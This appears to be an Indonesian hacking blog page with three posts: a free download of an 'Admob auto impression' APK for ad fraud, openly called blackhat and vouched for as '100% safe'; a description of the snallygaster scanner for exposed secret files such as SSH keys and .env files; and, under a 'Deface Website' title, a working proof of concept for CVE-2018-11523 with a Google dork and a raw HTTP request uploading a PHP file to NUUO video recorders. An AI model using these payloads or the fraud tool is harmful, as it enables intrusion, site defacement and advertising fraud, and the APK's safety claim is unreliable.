Sabtu, 30 Juni 2018

Download Gratis Tools Admob Auto Impression 100% Work

Download Gratis Tools Admob Auto Impression 100% Work


Semua tools admob yang dijual memiliki nama-nama unik dan juga harga yang sangat bervariasi. Mulai dari puluhan ribu hingga ratusan ribu. Tak lupa mereka pun memberikan hasil screenshot penghasilan Admob hingga mencapai ratusan ribu rupiah sebagai testimoni. Mereka mengklaim bahwa penghasilan tersbut mereka dapatkan hanya dalam kurun waktu sehari menggunakan admob tools ini. Hal ini membuat kebanyakan orang tertarik dan berbondong-bondong untuk membeli admob tools ini.

Download Gratis Tools Admob Auto Impression 100% Work
Download Gratis Tools Admob Auto Impression 100% Work


Pada dasarnya tools admob ini merupakan teknik blackhat/curang. Untuk yang belum paham bisa searching dahulu pengertian dari blackhat. Jadi apapun yang dilakukan dengan dasar curang, akhirnya pasti mengecewakan. Jadi tolong diperhatikan bahwa resiko banned ditanggung penuh oleh pengguna. Saya hanya membagikan tools ini secara cuma-cuma alias gratis.

Download Gratis Tools Admob Auto Impression 100% Work

Langsung Saja Tanpa Basa Basi Banyak yak,,,

Download ZippyShare : Tai Kucing.apk / Anonymous.apk

Tenang ini bukan virus atau tipuan kok, jadi aman 100%.


Download

Laporkan Jika Link Download Mati ! disini. [ Lapor !! ]

Minggu, 17 Juni 2018

snallygaster – Scan For Secret Files On HTTP Servers

snallygaster – Scan For Secret Files On HTTP Servers


snallygaster is a Python-based tool that can help you to scan for secret files on HTTP servers, files that are accessible that shouldn’t be public and can pose a security risk.

snallygaster – Scan For Secret Files On HTTP Servers
snallygaster – Scan For Secret Files On HTTP Servers


Typical examples include publicly accessible git repositories, backup files potentially containing passwords or database dumps. In addition it contains a few checks for other security vulnerabilities.
snallygaster HTTP Secret File Scanner Features.

This is an overview of the tests provided by snallygaster.

  •     lfm_php – Checks for Lazy File Manager
  •     idea – Config file for JetBrains
  •     symphony_databases_yml – Symphony database config file
  •     rails_database_yml – Ruby on Rails default config file
  •     git_dir – Download the full Git repo
  •     svn_dir – Download the full SVN repo
  •     cvs_dir – Download the full CVS repo
  •     apache_server_status – Apache server-status page
  •     coredump – Memory dump file on Linux
  •     sftp_config – Configuration file from sublime FTP client
  •     wsftp_ini – Configuration file for WS_FTP
  •     filezilla_xml – Configuration file for FileZilla
  •     winscp_ini – Configuration file for WinSCP
  •     ds_store – Apple OS X File Manager
  •     backupfiles – Backup files and other leftovers from editors
  •     deadjoe – JOE editor dump file
  •     sql_dump – Checks for common names of SQL database dumps
  •     bitcoin_wallet – Scans for Bitcoin wallet files
  •     drupal_backup_migrate – Drupal migration backup
  •     magento_config – Magento XML based config file
  •     xaa – Output of the Linux split command
  •     optionsbleed – Checks for Optionsbleed vuln
  •     privatekey – Checks for private keys
  •     sshkey – Looks for SSH private keys
  •     dotenv – Looks for Laravel .env files
  •     invalidsrc – Checks webpage source for all inaccessible references
  •     ilias_defaultpw – Checks for the Ilias e-learning software default creds
  •     cgiecho – Leaks files from cgiemail
  •     phpunit_eval – Test for remote code execution
  •     axfr – Checks for DNS AXFR zone transfer requests


You could probably achieve something similar with Burp Intruder or Patator and something like the quickhits list from SecLists.

You can download snallygaster here:


Download

Laporkan Jika Link Download Mati ! disini. [ Lapor !! ]

Senin, 04 Juni 2018

Deface Website Metode NUUO NVRmini2 / NVRsolo - Arbitrary File Upload

Deface Website Metode NUUO NVRmini2 / NVRsolo - Arbitrary File Upload


# Exploit Title: NUUO NVRmini2 / NVRsolo Arbitrary File Upload Vulnerability
# Google Dork: intitle:NUUO Network Video Recorder Login
# Date: 2018-05-20
# Exploit Author: M3@Pandas
# Vendor Homepage: http://www.nuuo.com
# Software Link: N/A
# Version: all
# Tested on: PHP Linux
# CVE : CVE-2018-11523


==========================
Advisory: NUUO NVRmini2 / NVRsolo Arbitrary File Upload Vulnerability
Author: M3@pandas From DBAppSecurity
Affected Version: All
==========================

Vulnerability Description

==========================
Recetly, I found an Arbitrary File Upload Vulnerability in 'NUUO NVRmini2' program, NVRmini2 is widely used all over
the world.
Vulnerable cgi: /upload.php
<?php
//echo $_FILES['userfile']['type'];
//echo ":";
//echo $_FILES['userfile']['size'];
//echo ":";
//echo urldecode($_FILES['userfile']['name']);
//echo ":";
//echo $_FILES['userfile']['tmp_name'];
//echo ":";
//echo $_FILES['userfile']['error'];
//echo ":";
echo $_FILES['userfile']['name'];
copy($_FILES["userfile"]["tmp_name"],$_FILES['userfile']['name']);
?>
As the code above, no any filter, so we can upload a php shell directly to the web server.
==========================

POC  EXP

==========================

1. Upload 'nuuonvr.php' to web root path:

POST /upload.php HTTP/1.1
Host: 192.168.10.1
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: multipart/form-data; boundary=--------969849961
Content-Length: 162
----------969849961
Content-Disposition: form-data; name="userfile"; filename="nuuonvr.php"
?php phpinfo();@unlink(__FILE__);?
----------969849961--


2. Check if the php file is uploaded successfully:

 If the page returns phpinfo info, target is vulnerable!

Download

Laporkan Jika Link Download Mati ! disini. [ Lapor !! ]

Iklan Melayang